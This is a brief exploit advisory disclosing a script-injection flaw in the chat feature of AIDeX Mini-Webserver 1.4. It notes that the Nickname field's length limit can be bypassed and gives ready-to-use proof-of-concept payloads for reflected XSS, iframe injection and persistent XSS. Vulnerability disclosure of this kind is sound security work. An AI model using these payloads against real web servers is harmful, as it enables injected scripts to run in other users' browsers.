# Exploit Title: AIDeX Mini-Webserver 1.4 integrated Chat Javascript Injection Vulnerability # Autor: wingthor # Author-Email:exploit@wingthor.de <mailto:exploit@wingthor.de> # Author-Website (german):http://www.wingthor.de <http://www.wingthor.de/> # Date: 30.12.10 # Tool: AIDeX Mini-Webserver # Version: 1.4 # Vendor-Site:http://www.aidex.de/software/webserver/download.html # Software Link:http://www.aidex.de/software/webserver/MiniWebserver.zip # Platform: Windows # Tested on: Windows XP Athttp://localhost:port/*chat/you can find the integrated Chat Function in the Webserver. You can use the "Nickname:" field (nick at the code-level) to inject Code. But Attention the field is limited with a Default of "maxlength=31", but you can simply override this value =) == Examples == XSS: Nickname = <script>alert('bam')</script> CSRF: Nickname = <iframe src=http://www.google.de> <http://www.google.de%3E/> Persistent XSS: Nickname = testuser"><script>alert('bam')</script>